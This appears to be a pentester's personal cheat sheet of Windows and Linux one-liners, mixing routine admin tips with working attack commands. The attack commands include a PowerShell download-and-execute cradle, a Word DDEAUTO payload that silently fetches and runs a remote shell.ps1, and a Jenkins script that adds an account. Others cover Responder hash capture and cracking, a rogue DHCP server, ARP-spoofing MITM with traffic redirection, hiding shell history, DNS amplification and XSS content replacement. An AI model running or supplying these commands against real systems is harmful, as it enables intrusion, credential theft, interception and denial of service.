Scribbles – notes and oneliners for infosec

Poor-man’s ping sweep on Windows:

for /L %A in (1,1,5) do (for /L %B in (0,1,5) do (for /L %C in (0,1,5) do (for /L %D in (0,1,5) do ping -n 1 %A.%B.%C.%D))) >> output.txt

Replace the 5’s with your desired range for each octet.

Find the domain controller in your local network:

nslookup
set type=all
_ldap._tcp.dc._msdcs.DOMAIN_Name

Replace DOMAIN_NAME with actual domain, available through systeminfo

Jenkins script execution:

def command = """net user YOUNEWUSER YOURNEWPASSWORD /ADD"""
def proc = command.execute()
proc.waitFor()
 
println "stdout: ${proc.in.text}"
Run
Result

Download and execute via PowerShell:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://1.2.3.4:8000/SomeScript.ps1');Invoke-SomeMethod -SomeParameter SomeValue"

Generate all numbers from zero to 200 with equal widht (leading zeroes):

seq -w 0 1 200

Generating usernames when convention is known:

echo -e {a..z}{A..Z}{0..9}| sed 's/ /\r\n/g'

Post-exploitation activities in order of noisiness:

  • Responder when on a busy network
    • sudo python Responder.py -i 1.2.3.4 -I eth0 -rdfw
      • Crack hashes
        • john Responder/logs/SMB-NTLMv2-SSP-1.2.3.4.txt –wordlist=BigPasswordList –rules
        • hashcat64.exe –remove -a 0 -m 5500 -o Cracked.txt hashes.txt Passwords.txt -r d3adhob0.rule.txt
  • Rogue DHCP server on the network (from the Responder package)
    • sudo python DHCP.py -I eth0 -r GATEWAYIP -p ATTACKERIP -s 127.0.1.1 -n 255.SUB.NET.MASK -d "DOMAIN_NAME" -w "http://ATTACKERIP/wpad.dat"
  • CrackMapExec for local admin account with weak default password
    • sudo cme smb smb-targets -u Administrator -p password --local-auth
  • CrackMapExec when username convention is known
    • sudo cme smb smb-targets -u usersinfile -p defaultpassword
  • Grab the frontpage of common web application ports
    • while read line ; do wget http://$line:80 --no-check-certificate -T 5 -t 2 -O frontpages/$line.html -o logfile.txt ; done < 1.2.3.4-masscan-port-80-ips
    • while read line ; do wget http://$line:443 --no-check-certificate -T 5 -t 2 -O frontpages/$line-443.html -o logfile.txt ; done < 1.2.3.4-masscan-port-443-ips
    • while read line ; do wget http://$line:8080 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8080.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8080-ips
    • while read line ; do wget http://$line:7001 --no-check-certificate -T 5 -t 2 -O frontpages/$line-7001.html -o logfile.txt ; done < 1.2.3.4-masscan-port-7001-ips
    • while read line ; do wget http://$line:8085 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8085.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8085-ips
    • while read line ; do wget http://$line:8090 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8090.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8090-ips
    • while read line ; do wget http://$line:8081 --no-check-certificate -T 5 -t 2 -O frontpages/$line-8081.html -o logfile.txt ; done < 1.2.3.4-masscan-port-8081-ips
  • Masscan of select ports
    • masscan -p 0-65535 1.2.3.4/24 --rate=40000 -oG 1.2.3.4-masscan-port-all

Get most commonly occurring ports on the network after a full masscan:

cat 1.2.3.4-masscan-port-all |awk '{print $3}' | sort | uniq -c | sort -n > top-ports

Decompile JNLP applications:

  • Download the JNLP file, open it up, copy all JAR-file URLs into a file
  • Run through the file and download all the JARs
  • touch jars && ls | grep .jar > jars && while read line; do unzip $line -d $line-unpacked; done < jars
  • Decompile the JARs with your favorite tool

Man-In-The-Middle without GUI tools:

  • sudo apt-get install dsniff
  • sudo arpspoof -i <your NIC> -t <the IP you want to grab data from> <the IP you want to impersonate (usually the gateway)>
  • All traffic will now end up on your computer. To automatically forward said traffic, run the following command: sudo sysctl net.ipv4.conf.all.forwarding=1
  • Traffic is now being forwarded. To see if you already have this enabled, run this: sysctl -a | grep forward
  • To disable it, just set forwarding=0
  • Now you can run Wireshark or tcpdump and sniff the traffic.

Man-In-The-Middle’ing web applications:

So you’ve successfully MITM’ed a host on the network. Now you can do all sorts of stuff and intercept traffic and files and what-not, but how about not just intercepting it, but altering it? More precisely, let’s say you want to intercept and alter every request made to  a website?

This can be done with some iptables magic and the Burp proxy.

On a linux box, execute the following:

iptables -F -t nat
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 443 -j DNAT –to 192.168.0.5:8080

This will make everything that is received on eth0 heading for port 443, pass through the proxy you have listening on port 8080 on the IP 192.168.0.5:8080

When you’re done, in my experience it’s easier to just clear the iptables and re-run you usual setup script, rather than extracting the lines you’ve just inputted.

Get linecount for code review estimation:

find $(pwd) -iname *.java > files.txt && while read line ; do wc -l $line ; done < files.txt > counts.txt && rm files.txt && cat counts.txt | cut -d” ” -f1 > numbers.txt && rm counts.txt && sum=0 ; while read num ; do sum=$(($sum + $num)) ; done < numbers.txt ; echo $sum && rm numbers.txt

Diffing files and folders:

diff <folder1> <folder2> -E -b -B -r -q This will list all the files that differ
diff <folder1> <folder2> -E -b -B -r This will show the actual differences

DNS cache snooping:

dig @<dns-server-ip> <domain-to-lookup> A       (regular lookup)

dig @<dns_server_ip> <domain_to_lookup> A +norecurse       (cached lookup)

Split string on delimiters:

cut -d ‘:’ -f 2 twitter.txt

This will split on the : character and remove it and the left-hand side of the string. -f 1 will remove the delimiter and the right-hand side

How to tar certain filetypes recursively

ls -R | egrep ‘.*.exe$’ > all_exe_files.txt
tar -cf tar.tar first_exe_filefrom_list.exe
while read line; do tar -rvf tar.tar $line; done < all_exe_files.txt

Verify if SSL session caching is enabled

openssl s_client -connect <ip:port> -reconnect
if the session IDs are the same, it’s enabled.

Verify if HTTP DEBUG is enabled in a oneliner

echo -e “DEBUG /page.aspx HTTP/1.0\r\nCommand: stop-debug\r\n\r\n” | openssl s_client -connect <ip>:<port> -quiet
if it returns 200 OK, it’s enabled

How to verify weak IPSec settings

ike-scan <ip> –trans=”(1=x, 2=y, 3=z, 4=w)”
where x=encryption algorithm, y=hash, z=auth, w=DH group.
see nta-monitor.com/wiki

DNS amplification DoS

dig . NS @<ip>

How to verify if TRACE is enabled

telnet to the server.
TRACE /HTTP/1.0
XST: <some number>
TC: <some number>
<enter>

Show iptables rules and policies

iptables -L -n –line-numbers

Kill process in Windows running under admin-user

runas /user:<domain>\<username> cmd
wmic
process
delete where name=”process.exe”

Linux get filesize

du <folder> -hc | grep total

Allow local user access via SSH

nano /etc/ssh/sshd_config
find the line “DenyUsers <username>”
and put an # in front of it.
restart sshd

Hide shell history

unset HISTFILE

How to run commands as admin on Windows

go to a commandprompt at type in: runas /user:[DOMAIN]\[USER] [COMMAND]

Reconnecting a client to WSUS

wuauclt /resetauthorization /detectnow

Force update of GPO

gpupdate /force

Grepping through everything

grep -rail    - recursive, treat everything is text, case insensitive, output files with matches

Convert epoch to human format:

cat acccess.log | awk '{$1=strftime("%F %T", $1, 1); print$0}'

Example:

date +%s | awk '{$1=strftime("%F %T", $1, 1); print $0}'

DDE macro-less exploitation:

In word, press ctrl+F9 to insert a field. Right click and enable field codes. Enter the following code:

DDEAUTO “APPLICATION_NAME” ” \\..\\Windows\\ABCDEFGHIJKLMNOPQRSTUVXYZ\\..\\System32\\calc.exe” “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABC”

APPLICATION_NAME is the name of the application that Word will ask you if you want to start

ABCDEFGHJ… is the remote data that Word will tell you is inaccessible. If you don’t use all charecters, you need to pad with \\..’es

System32\\calc.exe is of course the payload.

AAAAAAAAAAA is the error explanation shown when your payload executes. The less you pad before ABCDEFG the more characters you have for this message

The more you pad, the less room there is for you payload. This is my goto DDEAUTO, without any attempt at hidding it:

DDEAUTO c:\\Windows\\System32\\cmd.exe “/k powershell.exe -NoP -sta -NonI -w Hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://mydomain/shell.ps1’);powershell $e​


Using XSS to replace content:

<script>document.getElementsByTagName(“h2″)[2].innerHTML=”your content”; document.getElementsByTagName(“h1″)[0].innerHTML=”other stuff”;</script>


Replaces the 2nd H2 tag content and the first H1 content.